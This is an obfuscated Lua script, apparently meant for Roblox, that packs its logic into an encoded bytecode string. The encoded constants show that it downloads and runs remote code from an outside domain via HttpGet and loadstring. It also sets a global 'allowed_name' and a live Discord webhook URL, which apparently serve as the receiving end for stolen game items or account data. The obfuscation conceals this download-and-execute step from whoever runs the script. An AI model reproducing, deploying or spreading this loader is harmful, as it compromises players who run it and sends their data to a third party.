--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v100=v5(v81,v19);v19=nil;return v100;else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/(((882 -(282 + 595)) -(1640 -(1523 + 114)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v82-(v82%1) ;else local v83=0;local v84;while true do if (v83==(931 -(857 + 74))) then v84=(570 -(367 + 201))^(v32-(928 -(193 + 21 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -(51 + 175 + 1044))) + v36 ;end if (v35==((957 -(892 + 65)) -0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + (9 -5) ;return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -(64 + 23 + 263))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + (0 -0) ,79 -59 ) * ((954 -(345 + 457 + 150))^(85 -53))) + v42 ;local v46=v20(v43,37 -(27 -11) ,31);local v47=((v20(v43,24 + 8 )==((1436 -(145 + 293)) -(915 + 82))) and  -(2 -1)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(1187 -(1069 + 118))) then return v47 * (0 -0) ;else local v91=0 -0 ;while true do if (v91==(0 + 0)) then v46=1 -0 ;v44=0;break;end end end elseif (v46==(2031 + 16)) then return ((v45==(791 -(368 + 423))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((1471 -(44 + 386)) -(10 + 8)) ) * (v44 + (v45/((7 -5)^(494 -(416 + (1512 -(998 + 488))))))) ;end local function v25(v48) local v49=0 + 0 ;local v50;local v51;while true do if (v49==((0 -0) + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(772 -(201 + 571))) then return "";end end v49=1139 -(116 + 1022) ;end if (v49==3) then return v6(v51);end if (v49==(8 -6)) then v51={};for v92=1 + 0 + 0 + 0 , #v50 do v51[v92]=v2(v1(v3(v50,v92,v92)));end v49=10 -7 ;end if (v49==(3 -2)) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=861 -(814 + 45) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (2~=v52) then else local v88=0 + 0 ;while true do if (v88==(0 -0)) then v57=nil;v58=nil;v88=3 -2 ;end if (v88~=1) then else v52=3;break;end end end if ((374 -(123 + 251))==v52) then local v89=0 -0 ;while true do if (v89==1) then v52=699 -(208 + 490) ;break;end if (v89==0) then v53=0;v54=nil;v89=1 + 0 ;end end end if (v52==(1 + 0)) then local v90=0;while true do if (0==v90) then v55=nil;v56=nil;v90=837 -(660 + 176) ;end if (v90~=(1 + 0)) then else v52=2;break;end end end if (v52~=3) then else v59=nil;while true do local v94=202 -(14 + 188) ;local v95;while true do if (v94==0) then v95=0;while true do if (v95~=(676 -(534 + 141))) then else if (v53==(1 + 1)) then local v119=0;while true do if (0~=v119) then else for v154=1 + 0 ,v58 do local v155=0 + 0 ;local v156;local v157;while true do if (v155==0) then v156=v21();v157=nil;v155=1;end if ((1 -0)==v155) then if (v156==(1 -0)) then v157=v21()~=(0 -0) ;elseif (v156==2) then v157=v24();elseif (v156~=(2 + 1)) then else v157=v25();end v59[v154]=v157;break;end end end v57[3]=v21();v119=1;end if ((1 + 0)~=v119) then else for v158=1,v23() do local v159=396 -(115 + 281) ;local v160;local v161;while true do if ((0 -0)~=v159) then else local v167=0 + 0 ;local v168;while true do if (v167==0) then v168=0 -0 ;while true do if (v168==(0 -0)) then local v173=867 -(550 + 317) ;while true do if (v173~=0) then else v160=0;v161=nil;v173=1;end if (v173~=(1 -0)) then else v168=1 -0 ;break;end end end if (v168==1) then v159=1;break;end end break;end end end if (v159~=1) then else while true do if (v160~=(0 -0)) then else v161=v21();if (v20(v161,286 -(134 + 151) ,1)==0) then local v169=1665 -(970 + 695) ;local v170;local v171;local v172;while true do if (v169==0) then v170=v20(v161,3 -1 ,1993 -(582 + 1408) );v171=v20(v161,4,6);v169=3 -2 ;end if (v169==(1 -0)) then v172={v22(),v22(),nil,nil};if (v170==(0 -0)) then local v176=241 -(187 + 54) ;local v177;while true do if (v176==(780 -(162 + 618))) then v177=0 + 0 ;while true do if ((0 + 0)~=v177) then else v172[6 -3 ]=v22();v172[6 -2 ]=v22();break;end end break;end end elseif (v170==(1 + 0)) then v172[3]=v23();elseif (v170==2) then v172[1639 -(1373 + 263) ]=v23() -((1002 -(451 + 549))^(6 + 10)) ;elseif (v170==(4 -1)) then local v188=0;local v189;local v190;while true do if (v188==0) then v189=0 -0 ;v190=nil;v188=1385 -(746 + 638) ;end if (v188~=1) then else while true do if (v189~=(0 + 0)) then else v190=0 -0 ;while true do if (v190==0) then v172[344 -(218 + 123) ]=v23() -((1583 -(1535 + 46))^16) ;v172[4]=v22();break;end end break;end end break;end end end v169=2;end if (v169~=(2 + 0)) then else local v174=0;while true do if (v174==1) then v169=1 + 2 ;break;end if (v174==(560 -(306 + 254))) then if (v20(v171,1 + 0 ,1 -0 )==(1468 -(899 + 568))) then v172[2 + 0 ]=v59[v172[4 -2 ]];end if (v20(v171,605 -(268 + 335) ,2)==1) then v172[293 -(60 + 230) ]=v59[v172[3]];end v174=1;end end end if (v169==(575 -(426 + 146))) then if (v20(v171,1 + 2 ,3)~=(1457 -(282 + 1174))) then else v172[4]=v59[v172[4]];end v54[v158]=v172;break;end end end break;end end break;end end end v53=3;break;end end end if (v53==(812 -(569 + 242))) then local v120=0;while true do if ((0 -0)~=v120) then else v57={v54,v55,nil,v56};v58=v23();v120=1025 -(706 + 318) ;end if (v120==1) then v59={};v53=2;break;end end end break;end if (v95~=0) then else if (v53==(1254 -(721 + 530))) then local v121=0;while true do if (v121==(1271 -(945 + 326))) then for v162=1,v23() do v55[v162-(2 -1) ]=v28();end return v57;end end end if (0~=v53) then else local v122=0;while true do if (1==v122) then v56={};v53=1;break;end if ((0 + 0)~=v122) then else v54={};v55={};v122=1;end end end v95=1;end end break;end end end break;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=10) then if (v79<=4) then if (v79<=1) then if (v79>0) then local v101=v78[2];local v102,v103=v69(v76[v101](v13(v76,v101 + 1 ,v78[3])));v71=(v103 + v101) -1 ;local v104=0;for v117=v101,v71 do local v118=0;while true do if (v118==0) then v104=v104 + 1 ;v76[v117]=v102[v104];break;end end end else v70=v78[3];end elseif (v79<=2) then v76[v78[2]]=v78[3];elseif (v79==3) then v76[v78[2]][v78[3]]=v78[4];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=7) then if (v79<=5) then do return;end elseif (v79>6) then do return;end elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=8) then local v108=v78[2];v76[v108]=v76[v108](v13(v76,v108 + 1 ,v71));elseif (v79>9) then v76[v78[2]]=v62[v78[3]];else local v127=v78[2];v76[v127]=v76[v127]();end elseif (v79<=15) then if (v79<=12) then if (v79>11) then v76[v78[2]]=v62[v78[3]];else v70=v78[3];end elseif (v79<=13) then v76[v78[2]]();elseif (v79>14) then local v129=v78[2];local v130=v76[v78[3]];v76[v129 + 1 ]=v130;v76[v129]=v130[v78[4]];else local v134=v78[2];v76[v134]=v76[v134]();end elseif (v79<=18) then if (v79<=16) then v76[v78[2]][v78[3]]=v78[4];elseif (v79==17) then v76[v78[2]]=v78[3];else local v138=v78[2];local v139,v140=v69(v76[v138](v13(v76,v138 + 1 ,v78[3])));v71=(v140 + v138) -1 ;local v141=0;for v147=v138,v71 do local v148=0;while true do if (v148==0) then v141=v141 + 1 ;v76[v147]=v139[v141];break;end end end end elseif (v79<=19) then local v115=v78[2];v76[v115]=v76[v115](v13(v76,v115 + 1 ,v71));elseif (v79>20) then v76[v78[2]]();else local v142=v78[2];local v143=v76[v78[3]];v76[v142 + 1 ]=v143;v76[v142]=v143[v78[4]];end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F65676F72696B7573612E73706163652F61646F707403073O0067657467656E76030C3O00612O6C6F7765645F6E616D65030B3O007469676572686F726E753103073O00776562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132343936303436392O3530393639363534322F745767642O70444E36557231553052615164654B764F6A516B766E52716E644A7A6C576B766A495A3430375F5A6479597A5468333047644D7733467167465679446E703100163O0012113O00013O0026043O000B0001000200044O000B000100120C000100033O00120C000200043O002014000200020005001211000400064O0012000200044O001300013O00022O000D00010001000100044O001500010026043O00010001000100044O0001000100120C000100074O000900010001000200301000010008000900120C000100074O00090001000100020030100001000A000B0012113O00023O00044O000100012O00073O00017O00",v9(),...);